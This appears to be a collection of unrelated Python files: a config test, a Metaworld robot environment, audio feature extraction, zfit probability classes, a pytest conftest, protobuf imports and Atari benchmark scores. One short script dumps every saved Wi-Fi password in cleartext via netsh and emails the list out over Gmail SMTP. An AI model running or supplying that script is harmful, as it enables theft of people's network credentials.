assert hcfg("dataset.classes") == [4, 7, 8]
assert hcfg("net.name") == "efficientnet"
assert hcfg("net.num_layers") == 20
assert hcfg("net.ckpt_path") == "/path/to/efficientnet"
assert hcfg("run_name") == "test"
assert hcfg("lr") == 1e-10
assert hcfg("optimizer") == "adam"
assert hcfg("new_group.new_sub_group.new_sub_param") == {"t", "e", "s", "t"}
@hmain(base_cfg_dir, run_cfg_file=complex_run_file)
def test1() -> None:
check_cfg()
@hmain(base_cfg_dir, run_cfg_file="logs/test/run.yaml", parse_cmd_line=False)
def test2() -> None:
check_cfg()
test1()
test2()
shutil.rmtree("logs")
|
144113
|
import numpy as np
from gym.spaces import Box
from metaworld.envs import reward_utils
from metaworld.envs.asset_path_utils import full_v2_path_for
from metaworld.envs.mujoco.sawyer_xyz.sawyer_xyz_env import SawyerXYZEnv, _assert_task_is_set
class SawyerBinPickingEnvV2(SawyerXYZEnv):
"""
Motivation for V2:
V1 was often unsolvable because the cube could be located outside of
the starting bin. It could even be near the base of the Sawyer and out
of reach of the gripper. V2 changes the `obj_low` and `obj_high` bounds
to fix this.
Changelog from V1 to V2:
- (7/20/20) Changed object initialization space
- (7/24/20) Added Byron's XML changes
- (11/23/20) Updated reward function to new pick-place style
"""
def __init__(self):
hand_low = (-0.5, 0.40, 0.07)
hand_high = (0.5, 1, 0.5)
obj_low = (-0.21, 0.65, 0.02)
obj_high = (-0.03, 0.75, 0.02)
# Small bounds around the center of the target bin
goal_low = np.array([0.1199, 0.699, -0.001])
goal_high = np.array([0.1201, 0.701, +0.001])
super().__init__(
self.model_name,
hand_low=hand_low,
hand_high=hand_high,
)
self.init_config = {
'obj_init_angle': 0.3,
'obj_init_pos': np.array([-0.12, 0.7, 0.02]),
'hand_init_pos': np.array((0, 0.6, 0.2)),
}
self.goal = np.array([0.12, 0.7, 0.02])
self.obj_init_pos = self.init_config['obj_init_pos']
self.obj_init_angle = self.init_config['obj_init_angle']
self.hand_init_pos = self.init_config['hand_init_pos']
self._target_to_obj_init = None
self.hand_and_obj_space = Box(
np.hstack((self.hand_low, obj_low)),
np.hstack((self.hand_high, obj_high)),
)
self.goal_and_obj_space = Box(
np.hstack((goal_low[:2], obj_low[:2])),
np.hstack((goal_high[:2], obj_high[:2])),
)
self.goal_space = Box(goal_low, goal_high)
self._random_reset_space = Box(
np.hstack((obj_low, goal_low)),
np.hstack((obj_high, goal_high)),
)
@property
def model_name(self):
return full_v2_path_for('sawyer_xyz/sawyer_bin_picking.xml')
@_assert_task_is_set
def evaluate_state(self, obs, action):
(
reward,
near_object,
grasp_success,
obj_to_target,
grasp_reward,
in_place_reward
) = self.compute_reward(action, obs)
info = {
'success': float(obj_to_target <= 0.05),
'near_object': float(near_object),
'grasp_success': float(grasp_success),
'grasp_reward': grasp_reward,
'in_place_reward': in_place_reward,
'obj_to_target': obj_to_target,
'unscaled_reward': reward,
}
return reward, info
@property
def _target_site_config(self):
return []
def _get_id_main_object(self):
return self.unwrapped.model.geom_name2id('objGeom')
def _get_pos_objects(self):
return self.get_body_com('obj')
def _get_quat_objects(self):
return self.sim.data.get_body_xquat('obj')
def reset_model(self):
self._reset_hand()
self._target_pos = self.goal.copy()
self.obj_init_pos = self.init_config['obj_init_pos']
self.obj_init_angle = self.init_config['obj_init_angle']
obj_height = self.get_body_com('obj')[2]
if self.random_init:
self.obj_init_pos = self._get_state_rand_vec()[:2]
self.obj_init_pos = np.concatenate((self.obj_init_pos, [obj_height]))
self._set_obj_xyz(self.obj_init_pos)
self._target_pos = self.get_body_com('bin_goal')
self._target_to_obj_init = None
return self._get_obs()
def compute_reward(self, action, obs):
hand = obs[:3]
obj = obs[4:7]
target_to_obj = np.linalg.norm(obj - self._target_pos)
if self._target_to_obj_init is None:
self._target_to_obj_init = target_to_obj
in_place = reward_utils.tolerance(
target_to_obj,
bounds=(0, self.TARGET_RADIUS),
margin=self._target_to_obj_init,
sigmoid='long_tail',
)
threshold = 0.03
radii = [
np.linalg.norm(hand[:2] - self.obj_init_pos[:2]),
np.linalg.norm(hand[:2] - self._target_pos[:2])
]
# floor is a *pair* of 3D funnels centered on (1) the object's initial
# position and (2) the desired final position
floor = min([
0.02 * np.log(radius - threshold) + 0.2
if radius > threshold else 0.0
for radius in radii
])
# prevent the hand from running into the edge of the bins by keeping
# it above the "floor"
above_floor = 1.0 if hand[2] >= floor else reward_utils.tolerance(
max(floor - hand[2], 0.0),
bounds=(0.0, 0.01),
margin=0.05,
sigmoid='long_tail',
)
object_grasped = self._gripper_caging_reward(
action,
obj,
obj_radius=0.015,
pad_success_thresh=0.05,
object_reach_radius=0.01,
xz_thresh=0.01,
desired_gripper_effort=0.7,
high_density=True,
)
reward = reward_utils.hamacher_product(object_grasped, in_place)
near_object = np.linalg.norm(obj - hand) < 0.04
pinched_without_obj = obs[3] < 0.43
lifted = obj[2] - 0.02 > self.obj_init_pos[2]
# Increase reward when properly grabbed obj
grasp_success = near_object and lifted and not pinched_without_obj
if grasp_success:
reward += 1. + 5. * reward_utils.hamacher_product(
above_floor, in_place
)
# Maximize reward on success
if target_to_obj < self.TARGET_RADIUS:
reward = 10.
return (
reward,
near_object,
grasp_success,
target_to_obj,
object_grasped,
in_place
)
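# --- Illustration (not part of the original class) ----------------------------
# A minimal standalone sketch of the logarithmic "floor" funnel computed in
# compute_reward above: the height the gripper must stay above rises with the
# horizontal distance to either anchor point (object start or target) once that
# distance exceeds the 3 cm threshold. The anchor values in the comment below
# are made up for illustration only.
def _funnel_floor_example(hand_xy, anchors_xy, threshold=0.03):
    radii = [np.linalg.norm(hand_xy - a) for a in anchors_xy]
    return min(
        0.02 * np.log(r - threshold) + 0.2 if r > threshold else 0.0
        for r in radii
    )
# e.g. _funnel_floor_example(np.array([0.0, 0.7]),
#                            [np.array([-0.12, 0.7]), np.array([0.12, 0.7])])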
|
144243
|
import numpy as np
import librosa
import json
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import sys
sys.path.append('vggish/')
from math import pi
import pandas as pd
from tqdm import tqdm
from sklearn.preprocessing import OneHotEncoder
import pickle
import xgboost as xgb
from scipy.fftpack import fft, hilbert
import warnings
warnings.filterwarnings("ignore")
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
SR = 22050 # sample rate
FRAME_LEN = int(SR / 10) # 100 ms
HOP = int(FRAME_LEN / 2) # 50% overlap, i.e. a 50 ms hop length
MFCC_dim = 13 # the MFCC dimension
SR_VGG = 16000 # VGG pretrained model sample rate
checkpoint_path = "vggish/vggish_model.ckpt"
def sta_fun(np_data):
"""Extract various statistical features from the numpy array provided as input.
:param np_data: the numpy array to extract the features from
:type np_data: numpy.ndarray
:return: The extracted features as a vector
:rtype: numpy.ndarray
"""
# perform a sanity check
if np_data is None:
raise ValueError("Input array cannot be None")
# perform the feature extraction
dat_min = np.min(np_data)
dat_max = np.max(np_data)
dat_mean = np.mean(np_data)
dat_rms = np.sqrt(np.sum(np.square(np_data)) / len(np_data))
dat_median = np.median(np_data)
dat_qrl1 = np.percentile(np_data, 25)
dat_qrl3 = np.percentile(np_data, 75)
dat_lower_q = np.quantile(np_data, 0.25, interpolation="lower")
dat_higher_q = np.quantile(np_data, 0.75, interpolation="higher")
dat_iqrl = dat_higher_q - dat_lower_q
dat_std = np.std(np_data)
s = pd.Series(np_data)
dat_skew = s.skew()
dat_kurt = s.kurt()
# finally return the features in a concatenated array (as a vector)
return np.array([dat_mean, dat_min, dat_max, dat_std, dat_rms,
dat_median, dat_qrl1, dat_qrl3, dat_iqrl, dat_skew, dat_kurt])
def sta_fun_2(npdata): # 1D np array
"""Extract various statistical features from the VGG output.
    :param npdata: the numpy array to extract the features from
    :type npdata: numpy.ndarray
:return: The extracted features as a vector
:rtype: numpy.ndarray
"""
# perform a sanity check
if npdata is None:
raise ValueError("Input array cannot be None")
# perform the feature extraction
Mean = np.mean(npdata, axis=0)
Std = np.std(npdata, axis=0)
# finally return the features in a concatenated array (as a vector)
return np.concatenate((Mean, Std), axis=0).reshape(1, -1)
def get_period(signal, signal_sr):
"""Extract the period from the the provided signal
:param signal: the signal to extract the period from
:type signal: numpy.ndarray
:param signal_sr: the sampling rate of the input signal
:type signal_sr: integer
:return: a vector containing the signal period
:rtype: numpy.ndarray
"""
# perform a sanity check
if signal is None:
raise ValueError("Input signal cannot be None")
# transform the signal to the hilbert space
hy = hilbert(signal)
ey = np.sqrt(signal ** 2 + hy ** 2)
min_time = 1.0 / signal_sr
tot_time = len(ey) * min_time
pow_ft = np.abs(fft(ey))
peak_freq = pow_ft[3: int(len(pow_ft) / 2)]
peak_freq_pos = peak_freq.argmax()
peak_freq_val = 2 * pi * (peak_freq_pos + 2) / tot_time
period = 2 * pi / peak_freq_val
return np.array([period])
def extract_signal_features(signal, signal_sr):
"""Extract part of handcrafted features from the input signal.
:param signal: the signal the extract features from
:type signal: numpy.ndarray
:param signal_sr: the sample rate of the signal
:type signal_sr: integer
:return: the populated feature vector
:rtype: numpy.ndarray
"""
# normalise the sound signal before processing
signal = signal / np.max(np.abs(signal))
signal = np.nan_to_num(signal)
# trim the signal to the appropriate length
trimmed_signal, idc = librosa.effects.trim(signal, frame_length=FRAME_LEN, hop_length=HOP)
# extract the signal duration
signal_duration = librosa.get_duration(y=trimmed_signal, sr=signal_sr)
# use librosa to track the beats
tempo, beats = librosa.beat.beat_track(y=trimmed_signal, sr=signal_sr)
# find the onset strength of the trimmed signal
o_env = librosa.onset.onset_strength(trimmed_signal, sr=signal_sr)
# find the frames of the onset
onset_frames = librosa.onset.onset_detect(onset_envelope=o_env, sr=signal_sr)
    # count the number of detected onset frames
onsets = onset_frames.shape[0]
# decompose the signal into its magnitude and the phase components such that signal = mag * phase
mag, phase = librosa.magphase(librosa.stft(trimmed_signal, n_fft=FRAME_LEN, hop_length=HOP))
# extract the rms from the magnitude component
rms = librosa.feature.rms(y=trimmed_signal)[0]
# extract the spectral centroid of the magnitude
cent = librosa.feature.spectral_centroid(S=mag)[0]
# extract the spectral rolloff point from the magnitude
rolloff = librosa.feature.spectral_rolloff(S=mag, sr=signal_sr)[0]
# extract the zero crossing rate from the trimmed signal using the predefined frame and hop lengths
zcr = librosa.feature.zero_crossing_rate(trimmed_signal, frame_length=FRAME_LEN, hop_length=HOP)[0]
# pack the extracted features into the feature vector to be returned
signal_features = np.concatenate(
(
np.array([signal_duration, tempo, onsets]),
get_period(signal, signal_sr=signal_sr),
sta_fun(rms),
sta_fun(cent),
sta_fun(rolloff),
sta_fun(zcr),
),
axis=0,
)
# finally, return the gathered features and the trimmed signal
return signal_features, trimmed_signal
def extract_mfcc(signal, signal_sr=SR, n_fft=FRAME_LEN, hop_length=HOP, n_mfcc=MFCC_dim):
"""Extracts the Mel-frequency cepstral coefficients (MFCC) from the provided signal
:param signal: the signal to extract the mfcc from
:type signal: numpy.ndarray
:param signal_sr: the signal sample rate
:type signal_sr: integer
:param n_fft: the fft window size
:type n_fft: integer
:param hop_length: the hop length
:type hop_length: integer
:param n_mfcc: the dimension of the mfcc
:type n_mfcc: integer
:return: the populated feature vector
:rtype: numpy.ndarray
"""
# compute the mfcc of the input signal
mfcc = librosa.feature.mfcc(
y=signal, sr=signal_sr, n_fft=n_fft, hop_length=hop_length, n_mfcc=n_mfcc, dct_type=3
)
# extract the first and second order deltas from the retrieved mfcc's
mfcc_delta = librosa.feature.delta(mfcc, order=1, mode='nearest')
mfcc_delta2 = librosa.feature.delta(mfcc, order=2, mode='nearest')
# create the mfcc array
mfccs = []
# populate it using the extracted features
for i in range(n_mfcc):
mfccs.extend(sta_fun(mfcc[i, :]))
for i in range(n_mfcc):
mfccs.extend(sta_fun(mfcc_delta[i, :]))
for i in range(n_mfcc):
mfccs.extend(sta_fun(mfcc_delta2[i, :]))
# finally return the coefficients
return mfccs
def extract_features_hc(signal, signal_sr):
"""Extract hancrafted features from the input signal.
:param signal: the signal the extract features from
:type signal: numpy.ndarray
:param signal_sr: the sample rate of the signal
:type signal_sr: integer
:return: the extracted feature vector
:rtype: numpy.ndarray
"""
# extract the signal features
signal_features, trimmed_signal = extract_signal_features(signal, signal_sr)
    # extract the MFCCs from the trimmed signal and compute their statistical features
mfccs = extract_mfcc(trimmed_signal)
return np.concatenate((signal_features, mfccs), axis=0)
def extract_sound_features(metadata, audio_dataset_path):
"""Extract all sound features (handcrafted + VGG) from the input signal
:param metadata: the metadata dataframe with audio links
:type metadata: pandas dataframe
:param audio_dataset_path: path to the audio folder
:type audio_dataset_path: string
:return: the extracted feature vector
:rtype: numpy.ndarray
"""
import vggish_input
import vggish_params
import vggish_slim
with tf.Graph().as_default(), tf.Session() as sess:
# load pre-trained vggish model
vggish_slim.define_vggish_slim()
vggish_slim.load_vggish_slim_checkpoint(sess, checkpoint_path)
features_tensor = sess.graph.get_tensor_by_name(vggish_params.INPUT_TENSOR_NAME)
embedding_tensor = sess.graph.get_tensor_by_name(
vggish_params.OUTPUT_TENSOR_NAME
)
sound_features = []
# loop through the dataset using information from the metadata file
for index_num, row in tqdm(metadata.iterrows()):
# get the file path
file_name = os.path.join(os.path.abspath(audio_dataset_path),str(row['file_path']))
# extract basic sound data
audio, sample_rate = librosa.load(file_name, sr=SR, mono=True, offset=0.0, duration=None)
# extract vgg features
yt, index = librosa.effects.trim(audio, frame_length=FRAME_LEN, hop_length=HOP)
input_batch = vggish_input.waveform_to_examples(yt, SR_VGG)
[features_vgg] = sess.run(
[embedding_tensor], feed_dict={features_tensor: input_batch}
)
features_vgg = sta_fun_2(features_vgg)
features_vgg = features_vgg.reshape(features_vgg.shape[-1],)
# extract hc features
audio, sample_rate = librosa.load(file_name, res_type='kaiser_fast')
features_hc = extract_features_hc(audio, sample_rate)
# concat features
features = np.concatenate((features_hc, features_vgg), axis=0)
sound_features.append(features)
return sound_features
def extract_metadata_features(metadata, encoder_path):
"""Extract all metadata features
:param metadata: the metadata dataframe with audio links
:type metadata: pandas dataframe
:param encoder_path: path to the saved one hot encoder
:type encoder_path: string
:return: the extracted feature vector
:rtype: numpy.ndarray
"""
# process age column
mean_age = metadata['subject_age'].mean()
metadata['subject_age'] = metadata['subject_age'].fillna(mean_age)
# process gender column
with open(encoder_path, 'rb') as f:
encoder = pickle.load(f)
x_gender = encoder.transform(np.array(metadata['subject_gender']).reshape(-1, 1)).toarray()
x_gender = np.delete(x_gender, -1, 1)
metadata_features = np.concatenate([x_gender, np.array(metadata['subject_age']).reshape(-1,1)], axis=1)
return metadata_features
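# --- Usage sketch (not part of the original module) ---------------------------
# Extract the handcrafted features from a synthetic one-second 440 Hz tone.
# The VGGish branch is skipped here because it needs the pretrained checkpoint.
if __name__ == "__main__":
    t = np.linspace(0.0, 1.0, SR, endpoint=False)
    tone = 0.5 * np.sin(2 * pi * 440.0 * t)
    hc_features = extract_features_hc(tone, SR)
    print("handcrafted feature vector length:", hc_features.shape[0])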
|
144248
|
import subprocess, re, smtplib
def send_mail(email, message):
server = smtplib.SMTP("smtp.gmail.com", 587)
server.starttls()
sender_email = "<EMAIL>"
password = "<PASSWORD>"
server.login(sender_email, password)
server.sendmail(sender_email, email, message)
server.quit()
command = "netsh wlan show profiles"
networks = str(subprocess.check_output(command, shell=True))
network_names_list = re.findall(r"(?:Profile\s*:\s)(.*)", networks)
lis = network_names_list[0].split("\\r\\n")
network_names = []
for i in lis:
if ":" in i:
index = i.index(":")
network_names.append(i[index + 2 :])
else:
network_names.append(i)
result = ""
curr_result = ""
for i in network_names:
command = "netsh wlan show profiles " + i + " key = clear"
try:
curr_result = subprocess.check_output(command, shell=True)
result = result + str(curr_result)
except:
pass
result = result.split("\\r\\n")
content = ""
for i in result:
if "SSID name" in i:
content += i + " "
if "Key Content" in i:
content += i + "\n\n"
email = input('enter your email:')
send_mail(email, content)
|
144279
|
from __future__ import annotations
# Copyright (c) 2021 zfit
import typing
from collections.abc import Callable
from contextlib import suppress
import tensorflow_probability as tfp
import zfit_interface.typing as ztyping
from zfit_interface.pdf import ZfitPDF
from zfit_interface.variables import ZfitVar, ZfitSpace, ZfitParam
from zfit import convert_to_parameter, z
from zfit._variables.varsupport import VarSupports
from zfit.core.func import Func
from zfit.core.values import ValueHolder
from zfit.util.container import convert_to_container
from zfit.util.exception import (
SpecificFunctionNotImplemented,
NotExtendedPDFError, WorkInProgressError,
)
class Integration:
_analytic_integrals = {}
def __init__(self, mc_sampler=None, draws_per_dim=None, numeric_integrator=None):
self._analytic_integrals = self._analytic_integrals.copy()
if mc_sampler is None:
mc_sampler = lambda *args, **kwargs: tfp.mcmc.sample_halton_sequence(
*args, randomized=False, **kwargs
)
if numeric_integrator is None:
numeric_integrator = False # TODO
if draws_per_dim is None:
draws_per_dim = 40_000
self.numeric_integrator = numeric_integrator
self.mc_sampler = mc_sampler
self.draws_per_dim = draws_per_dim
def register_on_object(
self, var: ztyping.Variable, func: Callable, overwrite: bool = False
):
var = convert_to_container(var, frozenset)
if var in self._analytic_integrals and not overwrite:
raise ValueError(
f"An analytic integral for {var} is already registered and 'overwrite' is "
f"set to False."
)
self._analytic_integrals[var] = func
def get_available(self, var):
var = convert_to_container(var, frozenset)
candidates = sorted(
(v for v in self._analytic_integrals if var.issubset(v)), key=len
)
return {v: self._analytic_integrals[v] for v in candidates}
    def has_full(self, var):
        var = convert_to_container(var, frozenset)
        return len(self.get_available(var)) == len(var)
def has_partial(self, var):
var = convert_to_container(var, frozenset)
return bool(self.get_available(var))
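# --- Usage sketch (not part of the original module) ----------------------------
# Register a dummy analytic integral for the variable "x" and look it up again.
# The integral callable's signature below is a placeholder assumption.
def _integration_registry_example():
    integration = Integration()
    integration.register_on_object(["x"], lambda limits, params: 1.0)
    return integration.get_available(["x"])  # -> {frozenset({'x'}): <lambda>}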
class PDF(Func, ZfitPDF):
def __init__(
self,
obs: typing.Mapping[str, ZfitSpace] = None,
params: typing.Mapping[str, ZfitParam] = None,
var: typing.Mapping[str, ZfitVar] = None,
supports: typing.Mapping[str, typing.Mapping[str, VarSupports]] = None,
extended: bool = None,
norm: typing.Mapping[str, ZfitSpace] = None,
label: str | None = None,
):
self.supports = supports
if norm is None:
norm = obs.values() # TODO: preprocess
super().__init__(var=var, label=label)
if norm is None:
norm = self.space
self.norm = norm
if extended is not None:
self._set_yield(extended)
self.integration = Integration()
def _set_yield(self, value):
# if self.is_extended:
# raise AlreadyExtendedPDFError(f"Cannot extend {self}, is already extended.")
value = convert_to_parameter(value)
# self.add_cache_deps(value) # TODO
self._yield = value
@property
def is_extended(self) -> bool:
"""Flag to tell whether the model is extended or not.
Returns:
A boolean.
"""
return self._yield is not None
def __call__(self, var):
if self.is_extended:
return self.ext_pdf(var)
else:
return self.pdf(var)
def _pdf(self, var, norm):
raise SpecificFunctionNotImplemented
def pdf(
self,
var: ztyping.VarInputType,
norm: ztyping.NormInputType = None,
*,
options=None,
) -> ztyping.PDFReturnType:
"""Probability density function, normalized over `norm`.
Args:
var: `float` or `double` `Tensor`.
norm: :py:class:`~zfit.Space` to normalize over
Returns:
:py:class:`tf.Tensor` of type `self.dtype`.
"""
var = self._convert_check_input_var(var)
norm = self._convert_check_input_norm(norm, var=var)
if var.space is not None:
return self.integrate(limits=var, norm=norm, options=options)
value = self._call_pdf(var=var, norm=norm, options=options)
return value
# with self._convert_sort_x(var) as var:
# value = self._single_hook_pdf(x=var, norm_range=norm)
# if run.numeric_checks:
# z.check_numerics(value, message="Check if pdf output contains any NaNs of Infs")
# return z.to_real(value)
@z.function(wraps="model")
def _call_pdf(self, var, norm, *, options=None):
return self._pdf(var, norm) # TODO
def _ext_pdf(self, var, norm):
raise SpecificFunctionNotImplemented
def ext_pdf(
self,
var: ztyping.VarInputType,
norm: ztyping.NormInputType = None,
*,
options=None,
) -> ztyping.PDFReturnType:
"""Probability density function, normalized over `norm`.OneDim.
Args:
var: `float` or `double` `Tensor`.
norm: :py:class:`~zfit.Space` to normalize over
Returns:
:py:class:`tf.Tensor` of type `self.dtype`.
"""
if not self.is_extended:
raise NotExtendedPDFError
var = self._convert_check_input_var(var)
norm = self._convert_check_input_norm(norm, var=var)
if var.space is not None:
return self.integrate(limits=var, norm=norm, options=options)
return self._call_ext_pdf(var=var, norm=norm, options=options)
@z.function(wraps="model")
def _call_ext_pdf(self, var, norm, *, options=None):
return self._ext_pdf(var, norm) # TODO
def _integrate(self, var, norm, options):
raise SpecificFunctionNotImplemented
def integrate(self, limits, norm=None, *, var=None, options=None):
var = self._convert_check_input_var(limits, var)
if var.space is None:
raise ValueError(
f"No space is given to integrate of {self}, needs at least one."
)
norm = self._convert_check_input_norm(norm, var=var)
return self._call_integrate(var=var, norm=norm, options=options)
@z.function(wraps="model")
def _call_integrate(self, var, norm, options):
with suppress(SpecificFunctionNotImplemented):
return self._auto_integrate(var, norm, options=options)
if self.is_extended:
return (
self._auto_ext_integrate(var, norm, options=options) / self.get_yield()
)
return self._fallback_integrate(var, norm, options=options)
def _auto_integrate(self, var, norm, options):
with suppress(SpecificFunctionNotImplemented):
return self._integrate(var, norm, options=options)
return self._fallback_integrate(var=var, norm=norm, options=options)
def _fallback_integrate(self, var, norm, options):
pass
def _ext_integrate(self, var, norm, options):
raise SpecificFunctionNotImplemented
def _values(self, var=None, options=None):
if self.is_extended:
return self.rel_counts(var=var, options=options)
else:
return self.counts(var=var, options=options)
def counts(self, *, var=None, norm=None, options=None):
return self._call_counts(var=var, norm=norm, options=options)
def _call_counts(self, var=None, norm=None, options=None):
with suppress(SpecificFunctionNotImplemented):
return self._counts(var, norm, options=options) # TODO: auto_value?
return self._call_ext_pdf(var=var, norm=norm, options=options)
def _counts(self, var=None, norm=None, options=None):
raise SpecificFunctionNotImplemented
def rel_counts(self, *, var=None, norm=None, options=None):
return self._call_rel_counts(var=var, norm=norm, options=options)
def _call_rel_counts(self, var=None, norm=None, options=None):
with suppress(SpecificFunctionNotImplemented):
return self._rel_counts(var, norm, options=options) # TODO: auto_value?
return self._fallback_rel_counts(var=var, norm=norm, options=options)
def _rel_counts(self, var=None, norm=None, options=None):
raise SpecificFunctionNotImplemented
def _fallback_rel_counts(self, var, norm, options):
raise WorkInProgressError
def ext_integrate(self, limits, norm=None, *, var=None, options=None):
if not self.is_extended:
raise NotExtendedPDFError
var = self._convert_check_input_var(limits, var)
if var.space is None:
raise ValueError(
f"No space is given to integrate of {self}, needs at least one."
)
norm = self._convert_check_input_norm(norm, var=var)
return self._call_ext_integrate(var=var, norm=norm, options=options)
@z.function(wraps="model")
def _call_ext_integrate(self, var, norm, options):
with suppress(SpecificFunctionNotImplemented):
return self._auto_ext_integrate(var, norm, options=options)
if self.is_extended:
return self._auto_integrate(var, norm, options=options) * self.get_yield()
return self._fallback_ext_integrate(var, norm, options=options)
def _auto_ext_integrate(self, var, norm, options):
return self._ext_integrate(var, norm, options=options)
def _fallback_ext_integrate(self, var, norm, options):
pass # TODO
# return self.integration.mixed(var, norm, options)
def _convert_check_input_var(self, var):
var = ValueHolder(var)
return var # TODO
def _convert_check_input_norm(self, norm, var):
if norm is None:
norm = self.norm
        return norm  # TODO: add further conversion/checks
class UnbinnedPDF(PDF):
def __init__(self, obs, params=None, var=None, supports=None, extended=None, norm=None):
supports_default = 'ext_pdf' if extended else 'pdf'
if supports is None:
supports = {}
if supports_default not in supports:
supports[supports_default] = {}
if obs is None:
obs_supports = {}
else:
obs_supports = {
axis: VarSupports(var=ob.name, data=True)
for axis, ob in obs.items()
if not isinstance(ob, VarSupports)
}
if params is None:
params_supports = {}
else:
params_supports = {
axis: VarSupports(var=p.name, scalar=True) for axis, p in params.items()
}
if var is None:
var_supports = {}
else:
var_supports = var.copy()
var_supports.update(obs_supports)
var_supports.update(params_supports)
        supports[supports_default] = var_supports
super().__init__(obs=obs, params=params, var=var, supports=supports, extended=extended, norm=norm)
class HistPDF(PDF):
def __init__(
self,
obs: typing.Mapping[str, ZfitSpace] = None,
params: typing.Mapping[str, ZfitParam] = None,
var: typing.Mapping[str, ZfitVar] = None,
supports: typing.Mapping[str, typing.Mapping[str, VarSupports]] = None,
extended: bool = None,
norm: typing.Mapping[str, ZfitSpace] = None,
label: str | None = None,
):
supports_default = 'counts' if extended else 'rel_counts'
if supports is None:
supports = {}
if supports_default not in supports:
supports[supports_default] = {}
if obs is None:
obs_supports = {}
else:
obs_supports = {
axis: VarSupports(var=ob.name, binned=True)
for axis, ob in obs.items()
if not isinstance(ob, VarSupports)
}
if params is None:
params_supports = {}
else:
params_supports = {
axis: VarSupports(var=p.name, scalar=True) for axis, p in params.items()
}
if var is None:
var_supports = {}
else:
var_supports = var.copy()
var_supports.update(obs_supports)
var_supports.update(params_supports)
supports[supports_default] = var_supports
if 'pdf' not in supports:
supports['pdf'] = {axis: VarSupports(var=v.var, full=True)
for axis, v in supports[supports_default].items()}
if 'ext_pdf' not in supports:
supports['ext_pdf'] = {axis: VarSupports(var=v.var, full=True)
for axis, v in supports[supports_default].items()}
super().__init__(
obs=obs, params=params, var=var, extended=extended, norm=norm, label=label, supports=supports,
)
def _ext_pdf(self, var, norm): # TODO: normalization?
counts = self._call_counts(var=var, norm=norm)
binareas = var.binned.binning.areas
densities = counts / binareas
return densities
def _pdf(self, var, norm): # TODO: normalization?
counts = self._call_rel_counts(var=var, norm=norm)
binareas = var.binned.binning.areas
densities = counts / binareas
return densities
|
144299
|
def pytest_addoption(parser):
# Where to find curl-impersonate's binaries
parser.addoption("--install-dir", action="store", default="/usr/local")
parser.addoption("--capture-interface", action="store", default="eth0")
|
144349
|
from .application_pb2 import *
from .application_pb2_grpc import *
from .device_pb2 import *
from .device_pb2_grpc import *
from .deviceProfile_pb2_grpc import *
from .deviceProfile_pb2 import *
from .deviceQueue_pb2_grpc import *
from .deviceQueue_pb2 import *
from .frameLog_pb2_grpc import *
from .frameLog_pb2 import *
from .fuotaDeployment_pb2_grpc import *
from .fuotaDeployment_pb2 import *
from .gateway_pb2_grpc import *
from .gateway_pb2 import *
from .gatewayProfile_pb2_grpc import *
from .gatewayProfile_pb2 import *
from .internal_pb2_grpc import *
from .internal_pb2 import *
from .multicastGroup_pb2_grpc import *
from .multicastGroup_pb2 import *
from .networkServer_pb2_grpc import *
from .networkServer_pb2 import *
from .organization_pb2_grpc import *
from .organization_pb2 import *
from .profiles_pb2_grpc import *
from .profiles_pb2 import *
from .serviceProfile_pb2_grpc import *
from .serviceProfile_pb2 import *
from .user_pb2_grpc import *
from .user_pb2 import *
|
144363
|
entries = [
{
'env-title': 'atari-alien',
'env-variant': 'No-op start',
'score': 3166,
},
{
'env-title': 'atari-amidar',
'env-variant': 'No-op start',
'score': 1735,
},
{
'env-title': 'atari-assault',
'env-variant': 'No-op start',
'score': 7203,
},
{
'env-title': 'atari-asterix',
'env-variant': 'No-op start',
'score': 406211,
},
{
'env-title': 'atari-asteroids',
'env-variant': 'No-op start',
'score': 1516,
},
{
'env-title': 'atari-atlantis',
'env-variant': 'No-op start',
'score': 841075,
},
{
'env-title': 'atari-bank-heist',
'env-variant': 'No-op start',
'score': 976,
},
{
'env-title': 'atari-battle-zone',
'env-variant': 'No-op start',
'score': 28742,
},
{
'env-title': 'atari-beam-rider',
'env-variant': 'No-op start',
'score': 14074,
},
{
'env-title': 'atari-berzerk',
'env-variant': 'No-op start',
'score': 1645,
},
{
'env-title': 'atari-bowling',
'env-variant': 'No-op start',
'score': 81.8,
},
{
'env-title': 'atari-boxing',
'env-variant': 'No-op start',
'score': 97.8,
},
{
'env-title': 'atari-breakout',
'env-variant': 'No-op start',
'score': 748,
},
{
'env-title': 'atari-centipede',
'env-variant': 'No-op start',
'score': 9646,
},
{
'env-title': 'atari-chopper-command',
'env-variant': 'No-op start',
'score': 15600,
},
{
'env-title': 'atari-crazy-climber',
'env-variant': 'No-op start',
'score': 179877,
},
{
'env-title': 'atari-defender',
'env-variant': 'No-op start',
'score': 47092,
},
{
'env-title': 'atari-demon-attack',
'env-variant': 'No-op start',
'score': 130955,
},
{
'env-title': 'atari-double-dunk',
'env-variant': 'No-op start',
'score': 2.5,
},
{
'env-title': 'atari-enduro',
'env-variant': 'No-op start',
'score': 3454,
},
{
'env-title': 'atari-fishing-derby',
'env-variant': 'No-op start',
'score': 8.9,
},
{
'env-title': 'atari-freeway',
'env-variant': 'No-op start',
'score': 33.9,
},
{
'env-title': 'atari-frostbite',
'env-variant': 'No-op start',
'score': 3965,
},
{
'env-title': 'atari-gopher',
'env-variant': 'No-op start',
'score': 33641,
},
{
'env-title': 'atari-gravitar',
'env-variant': 'No-op start',
'score': 440,
},
{
'env-title': 'atari-hero',
'env-variant': 'No-op start',
'score': 38874,
},
{
'env-title': 'atari-ice-hockey',
'env-variant': 'No-op start',
'score': -3.5,
},
{
'env-title': 'atari-jamesbond',
'env-variant': 'No-op start',
'score': 1909,
},
{
'env-title': 'atari-kangaroo',
'env-variant': 'No-op start',
'score': 12853,
},
{
'env-title': 'atari-krull',
'env-variant': 'No-op start',
'score': 9735,
},
{
'env-title': 'atari-kung-fu-master',
'env-variant': 'No-op start',
'score': 48192,
},
{
'env-title': 'atari-montezuma-revenge',
'env-variant': 'No-op start',
'score': 0.0,
},
{
'env-title': 'atari-ms-pacman',
'env-variant': 'No-op start',
'score': 3415,
},
{
'env-title': 'atari-name-this-game',
'env-variant': 'No-op start',
'score': 12542,
},
{
'env-title': 'atari-phoenix',
'env-variant': 'No-op start',
'score': 17490,
},
{
'env-title': 'atari-pitfall',
'env-variant': 'No-op start',
'score': 0.0,
},
{
'env-title': 'atari-pong',
'env-variant': 'No-op start',
'score': 20.9,
},
{
'env-title': 'atari-private-eye',
'env-variant': 'No-op start',
'score': 15095,
},
{
'env-title': 'atari-qbert',
'env-variant': 'No-op start',
'score': 23784,
},
{
'env-title': 'atari-riverraid',
'env-variant': 'No-op start',
